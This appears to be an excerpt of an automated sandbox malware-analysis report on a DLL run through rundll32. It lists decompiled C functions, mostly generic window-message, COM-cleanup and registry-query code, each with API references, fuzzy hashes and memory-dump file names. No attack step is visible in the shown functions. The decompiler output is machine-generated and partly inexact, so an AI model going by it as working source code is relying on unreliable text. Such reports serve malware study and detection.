Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Variant$ClearFreeString$H_prolog3_memset$Copy
String ID:
API String ID: 2905758408-0
Opcode ID: 6b551a76efa184ea6f413da9726cfbd70e5b0d5117deedbe95520abb89a41a64
Instruction ID: ceb74f55e44ee9bcef50cea17c44e0e4c1adfe79803e4b69d5972ce8ea6398f3
Opcode Fuzzy Hash: 6b551a76efa184ea6f413da9726cfbd70e5b0d5117deedbe95520abb89a41a64
Instruction Fuzzy Hash: 3551F271A006099FDB51CFA4C884BEEBBF9FF49305F104529E116EB292DB74E984CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10017235 Relevance: 10.6, APIs: 7, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E10017235(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t59;
				signed int _t63;
				signed int _t64;
				signed int _t69;
				signed int _t70;
				signed int _t71;
				void* _t81;
				intOrPtr* _t82;
				void* _t97;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t103;

				_t103 = __eflags;
				_push(0x60);
				E1001FBC4(E1003426F, __ebx, __edi, __esi);
				_t97 =  *(_t101 + 8) + 0xffffff28;
				E1000EC55(_t101 - 0x18, _t103,  *((intOrPtr*)( *(_t101 + 8) - 0xbc)));
				 *(_t101 - 4) = 0;
				if( *((intOrPtr*)(_t97 + 0x88)) != 0) {
					L19:
					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
					__eflags =  *(_t101 - 0x14);
					if( *(_t101 - 0x14) != 0) {
						_push( *((intOrPtr*)(_t101 - 0x18)));
						_push(0);
						E1000E519();
					}
					_t59 = 0;
					__eflags = 0;
					L22:
					return E1001FC9C(_t59);
				}
				if( *((intOrPtr*)(_t97 + 0x90)) != 0) {
					L6:
					__eflags =  *((intOrPtr*)(_t97 + 0x9c)) -  *(_t101 + 0xc);
					if( *((intOrPtr*)(_t97 + 0x9c)) !=  *(_t101 + 0xc)) {
						goto L19;
					}
					_t81 = _t97 + 0xac;
					__imp__#9(_t81);
					_t63 =  *(_t97 + 0x50);
					__eflags = _t63;
					_t85 = 0 | __eflags != 0x00000000;
					 *(_t101 + 8) = 0;
					__eflags = __eflags != 0;
					if(__eflags != 0) {
						L9:
						_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x1003b21c, _t101 + 8);
						__eflags = _t64;
						if(_t64 < 0) {
							goto L19;
						}
						E10020F40(_t97, _t101 - 0x48, 0, 0x20);
						E10020F40(_t97, _t101 - 0x28, 0, 0x10);
						_t69 =  *(_t101 + 8);
						_t102 = _t102 + 0x18;
						__eflags = _t69;
						_t85 = 0 | __eflags != 0x00000000;
						__eflags = __eflags != 0;
						if(__eflags == 0) {
							goto L8;
						}
						_t70 =  *((intOrPtr*)( *_t69 + 0x18))(_t69,  *(_t101 + 0xc), 0x1003b19c, 0, 2, _t101 - 0x28, _t81, _t101 - 0x48, _t101 - 0x10);
						__eflags =  *(_t101 - 0x44);
						_t82 = __imp__#6;
						 *(_t101 + 0xc) = _t70;
						if( *(_t101 - 0x44) != 0) {
							 *_t82( *(_t101 - 0x44));
						}
						__eflags =  *(_t101 - 0x40);
						if( *(_t101 - 0x40) != 0) {
							 *_t82( *(_t101 - 0x40));
						}
						__eflags =  *(_t101 - 0x3c);
						if( *(_t101 - 0x3c) != 0) {
							 *_t82( *(_t101 - 0x3c));
						}
						_t71 =  *(_t101 + 8);
						 *((intOrPtr*)( *_t71 + 8))(_t71);
						__eflags =  *(_t101 + 0xc);
						if( *(_t101 + 0xc) >= 0) {
							 *((intOrPtr*)(_t97 + 0xa8)) = 1;
						}
						goto L19;
					}
					L8:
					_t63 = E10004E6E(_t81, _t85, _t97, 0, __eflags);
					goto L9;
				}
				 *(_t101 - 0x68) =  *(_t101 + 0xc);
				 *((intOrPtr*)(_t101 - 0x6c)) = 2;
				 *((intOrPtr*)(_t101 - 0x64)) = 0;
				 *((intOrPtr*)(_t101 - 0x60)) = 0;
				 *((intOrPtr*)(_t101 - 0x5c)) = 0;
				 *((intOrPtr*)(_t101 - 0x54)) = 0;
				 *((intOrPtr*)(_t101 - 0x50)) = 0;
				 *((intOrPtr*)(_t101 - 0x4c)) = 0;
				E10014F82(_t97, _t101 - 0x6c);
				if( *((intOrPtr*)(_t101 - 0x54)) == 0) {
					goto L6;
				}
				 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
				_t98 =  *((intOrPtr*)(_t101 - 0x54));
				if( *(_t101 - 0x14) != 0) {
					_push( *((intOrPtr*)(_t101 - 0x18)));
					_push(0);
					E1000E519();
				}
				_t59 = _t98;
				goto L22;
			}

APIs

__EH_prolog3.LIBCMT ref: 1001723C
VariantClear.OLEAUT32(?), ref: 100172D2
_memset.LIBCMT ref: 1001730B
_memset.LIBCMT ref: 10017317
SysFreeString.OLEAUT32(?), ref: 1001735C
SysFreeString.OLEAUT32(?), ref: 10017366
SysFreeString.OLEAUT32(?), ref: 10017370

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: FreeString$_memset$ClearH_prolog3Variant
String ID:
API String ID: 3574576181-0
Opcode ID: 6d4b1ec007ad95306a116e0e912d8190e96039f5086e4f4408e6ab6921ed133c
Instruction ID: 2d0dd3affd8f04fec97c60edc25b67d043c515f8611652d59fdaf26af88a8b29
Opcode Fuzzy Hash: 6d4b1ec007ad95306a116e0e912d8190e96039f5086e4f4408e6ab6921ed133c
Instruction Fuzzy Hash: 66414871900629EFCB01CFA4C8459DEBBB9FF08B50F10851AF529AF155C770AA82CF91

Uniqueness

Uniqueness Score: -1.00%

Function 100072BC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117
registryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E100072BC(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
				char _v4;
				intOrPtr _v12;
				char* _v16;
				void* _v20;
				char* _v24;
				char _v28;
				long _v32;
				char _v36;
				char _v272;
				char _v280;
				intOrPtr _v292;
				void* __ebp;
				signed int _t40;
				char _t44;
				void* _t47;
				void* _t54;
				char* _t61;
				void* _t77;
				void* _t80;
				void* _t81;
				intOrPtr _t94;
				void* _t98;
				void* _t100;
				void* _t101;
				char* _t104;

				_t95 = __edx;
				_t81 = __ecx;
				_t79 = __ebx;
				_t104 =  &_v272;
				_t40 =  *0x10045580; // 0x2ef01728
				_a264 = _t40 ^ _t104;
				_push(0x18);
				E1001FBC4(E1003309F, __ebx, __edi, __esi);
				_t100 = __ecx;
				_v20 = 0;
				_v32 = 0;
				_t44 = E1000701D(__ecx, __edx);
				_v28 = _t44;
				if(_t44 != 0) {
					do {
						__eax =  &_v28;
						_push(__eax);
						__ecx = __esi;
						E1000702E();
						__eflags = __eax - __edi;
						if(__eax != __edi) {
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)(__edx + 0xc))(__edi, 0xfffffffc, __edi, __edi);
						}
						__eflags = _v28 - __edi;
					} while (_v28 != __edi);
				}
				__eflags =  *(_t100 + 0x54);
				if( *(_t100 + 0x54) == 0) {
					L15:
					 *[fs:0x0] = _v12;
					_pop(_t98);
					_pop(_t101);
					_pop(_t80);
					_t47 = E1001FBB5(1, _t80, _a264 ^ _t104, _t95, _t98, _t101);
					__eflags =  &_a268;
					return _t47;
				} else {
					__eflags =  *(_t100 + 0x68);
					__eflags = 0 |  *(_t100 + 0x68) != 0x00000000;
					if(__eflags != 0) {
						_push("Software\\");
						E1000563B(_t79,  &_v16, 0, _t100, __eflags);
						_v4 = 0;
						E10005500( &_v16,  *(_t100 + 0x54));
						_push(0x10037310);
						_push( &_v16);
						_push( &_v36);
						_t54 = E10007149(_t79, 0, _t100, __eflags);
						_push( *(_t100 + 0x68));
						_v4 = 1;
						_push(_t54);
						_push( &_v24);
						E10007149(_t79, 0, _t100, __eflags);
						_v4 = 3;
						E10001260(_v36 + 0xfffffff0, _t95);
						_push( &_v24);
						_push(0x80000001);
						E100071AD(_t79, 0, 0x80000001, __eflags);
						_t61 = RegOpenKeyA(0x80000001, _v16,  &_v20);
						__eflags = _t61;
						if(_t61 == 0) {
							__eflags = RegEnumKeyA(_v20, 0, _t104, 0x104) - 0x103;
							if(__eflags == 0) {
								_push( &_v16);
								_push(0x80000001);
								E100071AD(_t79, 0, 0x80000001, __eflags);
							}
							RegCloseKey(_v20);
						}
						RegQueryValueA(0x80000001, _v24, _t104,  &_v32);
						E10001260( &(_v24[0xfffffffffffffff0]), _t95);
						__eflags =  &(_v16[0xfffffffffffffff0]);
						E10001260( &(_v16[0xfffffffffffffff0]), _t95);
						goto L15;
					} else {
						_push(_t104);
						_push(_t81);
						_v280 = 0x10044410;
						E100209E8( &_v280, 0x1003e2dc);
						asm("int3");
						_push(4);
						E1001FBC4(E10032E9B, _t79, 0, _t100);
						_t94 = E100105C8(0x104);
						_v292 = _t94;
						_t77 = 0;
						_v280 = 0;
						if(_t94 != 0) {
							_t77 = E1000E58E(_t94);
						}
						return E1001FC9C(_t77);
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 100072DB
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 10007397
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100073AE
RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 100073C8
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 100073DA

Strings

Software\, xrefs: 10007330

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CloseEnumH_prolog3OpenQueryValue
String ID: Software\
API String ID: 3878845136-964853688
Opcode ID: 21590ef9a5705e8cadcff05ea3144ec4a30fa4c8191d2a2e3559474fe79f2317
Instruction ID: 431f38651a312ef553f30843a41239907c7d8c638de5ca089e0c10656c75fbe4
Opcode Fuzzy Hash: 21590ef9a5705e8cadcff05ea3144ec4a30fa4c8191d2a2e3559474fe79f2317
Instruction Fuzzy Hash: 5C41AC35D00109AFEB11DBA4CC81AEFB7B9FF44380F50052AF555E6295DB38AA44DB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000A486 Relevance: 10.6, APIs: 7, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000A486(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t42;
				struct tagMSG* _t43;
				signed int _t45;
				void* _t48;
				void* _t50;
				int _t53;
				long _t56;
				signed int _t62;
				intOrPtr* _t64;
				intOrPtr* _t67;
				void* _t68;

				_t63 = __ecx;
				_t62 = 1;
				_t67 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E1000EEC4(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t67 + 0x20));
				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
				_v4 = _t42;
				_t43 = E100069E2(0);
				_t68 = UpdateWindow;
				_v8 = _t43;
				while(1) {
					L14:
					_t73 = _v12;
					if(_v12 == 0) {
						goto L15;
					}
					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
					if(__eflags != 0) {
						while(1) {
							L15:
							_t45 = E10006DDA(_t63, 0, _t67, _t73);
							if(_t45 == 0) {
								break;
							}
							if(_t62 != 0) {
								_t53 = _v8->message;
								if(_t53 == 0x118 || _t53 == 0x104) {
									E1000EF92(_t67, 1);
									UpdateWindow( *(_t67 + 0x20));
									_t62 = 0;
								}
							}
							_t64 = _t67;
							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
							_t79 = _t48;
							if(_t48 == 0) {
								_t39 = _t67 + 0x3c;
								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
								__eflags =  *_t39;
								return  *((intOrPtr*)(_t67 + 0x44));
							} else {
								_t50 = E10006CF4(_t62, _t64, 0, _t67, _t68, _t79, _v8);
								_pop(_t63);
								if(_t50 != 0) {
									_v12 = 1;
									_v16 = 0;
								}
								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L14;
								}
							}
						}
						_push(0);
						E10005AC4();
						return _t45 | 0xffffffff;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						_t63 = _t67;
						E1000EF92(_t67, 1);
						UpdateWindow( *(_t67 + 0x20));
						_t62 = 0;
						__eflags = 0;
					}
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) == 0) {
						__eflags = _v4;
						if(_v4 != 0) {
							__eflags = _v16;
							if(_v16 == 0) {
								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
							}
						}
					}
					__eflags = _a4 & 0x00000002;
					if(__eflags != 0) {
						L13:
						_v12 = 0;
						continue;
					} else {
						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
						_v16 = _v16 + 1;
						__eflags = _t56;
						if(__eflags != 0) {
							continue;
						}
						goto L13;
					}
				}
				goto L15;
			}

APIs

GetParent.USER32(00000004), ref: 1000A4B4
PeekMessageA.USER32 ref: 1000A4DB
UpdateWindow.USER32(00000004), ref: 1000A4F5
SendMessageA.USER32 ref: 1000A519
SendMessageA.USER32 ref: 1000A533
UpdateWindow.USER32(00000004), ref: 1000A579
PeekMessageA.USER32 ref: 1000A5AD

Part of subcall function 1000EEC4: GetWindowLongA.USER32 ref: 1000EECF

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 81312818f5d17bdaee03eade2c04d216c59580afc644ccd1aa9e932482451fe0
Instruction ID: db41b359fa61aebdb5d40a64e0a657e9155f7da8113a89a494e7da7d34e0904b
Opcode Fuzzy Hash: 81312818f5d17bdaee03eade2c04d216c59580afc644ccd1aa9e932482451fe0
Instruction Fuzzy Hash: A3417E30604B829FF711CF258C88A1BBAF5FFCABD5F104A2DF5819606AD761D984CA52

Uniqueness

Uniqueness Score: -1.00%

Function 1000634E Relevance: 10.6, APIs: 7, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000634E(int __ebx, long __ecx, struct HWND__* __edi) {
				long _v4;
				char _v28;
				intOrPtr _v40;
				void* __esi;
				void* __ebp;
				long _t20;
				long _t21;
				struct HWND__* _t22;
				long _t23;
				struct HWND__* _t24;
				long _t25;
				struct HWND__* _t26;
				void* _t33;
				void* _t35;
				long _t39;
				long _t41;
				intOrPtr _t43;
				struct HWND__* _t47;
				struct HWND__* _t49;
				long _t51;
				long _t53;

				_t46 = __edi;
				_t39 = __ecx;
				_t37 = __ebx;
				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
					_t51 = E10005CAE();
					__eflags = _t51;
					if(_t51 != 0) {
						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
						__eflags = _t20;
						_t41 = _t51;
						_pop(_t52);
						if(_t20 != 0) {
							_t53 = _t41;
							_t21 =  *(_t53 + 0x64);
							__eflags = _t21;
							if(_t21 == 0) {
								_pop(_t52);
								goto L12;
							} else {
								__eflags = _t21 - 0x3f107;
								if(__eflags != 0) {
									_t35 = E1000EC09(__ebx, __edi, _t53, __eflags);
									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
								}
								return _t21;
							}
						} else {
							L12:
							_push(_t41);
							_push(_t37);
							_push(0);
							_push(_t52);
							_push(_t46);
							_v4 = _t41;
							_t22 = GetCapture();
							_t51 = SendMessageA;
							_t37 = 0x365;
							while(1) {
								_t47 = _t22;
								__eflags = _t47;
								if(_t47 == 0) {
									break;
								}
								_t23 = SendMessageA(_t47, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									L27:
									return _t23;
								} else {
									_t22 = E1000BB9A(_t41, _t47, __eflags, _t47);
									continue;
								}
								goto L33;
							}
							_t24 = GetFocus();
							while(1) {
								_t46 = _t24;
								__eflags = _t46;
								if(_t46 == 0) {
									break;
								}
								_t23 = SendMessageA(_t46, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									goto L27;
								} else {
									_t24 = E1000BB9A(_t41, _t46, __eflags, _t46);
									continue;
								}
								goto L33;
							}
							_t39 = _v4;
							_t25 = E1000BBDF(_t37, _t39, _t46);
							__eflags = _t25;
							if(_t25 != 0) {
								_t26 = GetLastActivePopup( *(_t25 + 0x20));
								while(1) {
									_t49 = _t26;
									__eflags = _t49;
									_push(0);
									if(_t49 == 0) {
										break;
									}
									_t23 = SendMessageA(_t49, _t37, 0, ??);
									__eflags = _t23;
									if(__eflags == 0) {
										_t26 = E1000BB9A(_t39, _t49, __eflags, _t49);
										continue;
									}
									goto L27;
								}
								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
								goto L27;
							} else {
								goto L1;
							}
						}
					} else {
						L1:
						_push(0);
						_push(_t39);
						_v28 = 0x10044410;
						E100209E8( &_v28, 0x1003e2dc);
						asm("int3");
						_push(4);
						E1001FBC4(E10032E9B, _t37, _t46, _t51);
						_t43 = E100105C8(0x104);
						_v40 = _t43;
						_t33 = 0;
						_v28 = 0;
						if(_t43 != 0) {
							_t33 = E1000E58E(_t43);
						}
						return E1001FC9C(_t33);
					}
				} else {
					__eflags = __eax - 0x3f107;
					if(__eax != 0x3f107) {
						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
					}
					return __eax;
				}
				L33:
			}

APIs

GetCapture.USER32 ref: 10011299
SendMessageA.USER32 ref: 100112B2
GetFocus.USER32(?,?,?,?,00000000), ref: 100112C4
SendMessageA.USER32 ref: 100112D0
GetLastActivePopup.USER32(?), ref: 100112F7
SendMessageA.USER32 ref: 10011302
SendMessageA.USER32 ref: 10011326

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastPopup
String ID:
API String ID: 3219385341-0
Opcode ID: 716a47092e3f78f770cd422c122928cf665f7e490dacdeb6f448e5856ba979fe
Instruction ID: 5a63e8befbd248d730497780d713f82145d505fb4d7f97fa76e00961cd780979
Opcode Fuzzy Hash: 716a47092e3f78f770cd422c122928cf665f7e490dacdeb6f448e5856ba979fe
Instruction Fuzzy Hash: BB31057170032AAFE715EB24CC84EAF7BEEEB896C4B224579F400CB159CB31DC4196A1

Uniqueness

Uniqueness Score: -1.00%

Function 1000AA1E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000AA1E(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E100069D9();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E1000EC3C(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E10020F40(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				E1000A84C(_t61, _t72, GetWindowLongA, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E1000A96A(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}

APIs

_memset.LIBCMT ref: 1000AAAB
SendMessageA.USER32 ref: 1000AAD4
GetWindowLongA.USER32 ref: 1000AAE6
GetWindowLongA.USER32 ref: 1000AAF7
SetWindowLongA.USER32 ref: 1000AB13

Strings

(, xrefs: 1000AACA

Memory Dump Source

Source File: 00000003.00000002.256826157.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.256820228.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256858129.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256868016.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256885461.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256890423.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256915965.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256923661.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256927715.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.256970454.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: (
API String ID: 2997958587-3887548279
Opcode ID: aa78740c6e25898a6f82f823b27cbc877ecf132d64a7ebce3814048f63547ad2
Instruction ID: a20b66fbb02a5be130650eb81bbfdf56ba9fafbfecf6f606b31a3a4f2e66e107
Opcode Fuzzy Hash: aa78740c6e25898a6f82f823b27cbc877ecf132d64a7ebce3814048f63547ad2
Instruction Fuzzy Hash: 7B31A1357007119FEB10DFB8C994A5EB7E8FF4A290F11062DE542A7A96DB31E840CB55

Uniqueness

Uniqueness Score: -1.00%

Function 1001A96C Relevance: 10.6, APIs: 7, Instructions: 86
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1001A96C(void* __ebx, void* __ecx) {
				void* __ebp;
				void* _t28;
				void* _t36;
				signed char _t37;
				intOrPtr _t41;
				void* _t42;
				void* _t44;
				intOrPtr _t45;
				void* _t46;

				_t39 = __ecx;
				_t36 = __ebx;
				_t41 =  *((intOrPtr*)(_t46 + 0x10));
				if(_t41 == 0) {
					_t45 =  *((intOrPtr*)(_t46 + 0x10));
					L14:
					_t42 = E1000A8F0(_t36, _t39, _t45, GetTopWindow( *(_t45 + 0x20)));
					if(_t42 != 0) {
						L7:
						if((GetWindowLongA( *(_t42 + 0x20), 0xffffffec) & 0x00010000) == 0) {
							L18:
							return _t42;
						}
						_push(_t36);
						_t37 =  *(_t46 + 0x1c);
						if((_t37 & 0x00000001) == 0 || IsWindowVisible( *(_t42 + 0x20)) != 0) {
							if((_t37 & 0x00000002) == 0) {
								L16:
								_push(_t37);
								_push(0);
								_push(_t42);
								goto L17;
							}
							_t39 = _t42;
							if(E1000EFB3(_t42) != 0) {
								goto L16;
							}
							goto L12;
						} else {
							L12:
							_push(_t37);
							_push(_t42);
							_push(_t45);
							L17:
							_t42 = E1001A96C(_t37, _t39);
							goto L18;
						}
					}
					return _t45;
				}
				_t28 = E1000A8F0(__ebx, _t39, _t44, GetWindow( *(_t41 + 0x20), 2));
				_t45 =  *((intOrPtr*)(_t46 + 0x10));
				while(_t28 == 0) {
					_t41 = E1001A917(_t45, E1000A8F0(_t36, _t39, _t45, GetParent( *(_t41 + 0x20))));
					if(_t41 == 0 || _t41 == _t45) {
						goto L14;
					} else {
						_t28 = E1000A8F0(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
						continue;
					}
				}
				_t42 = E1000A8F0(_t36, _t39, _t45, GetWindow( *(_t41 + 0x20), 2));
				goto L7;
			}

APIs

GetWindow.USER32(?,00000002), ref: 1001A987
GetParent.USER32(?), ref: 1001A998
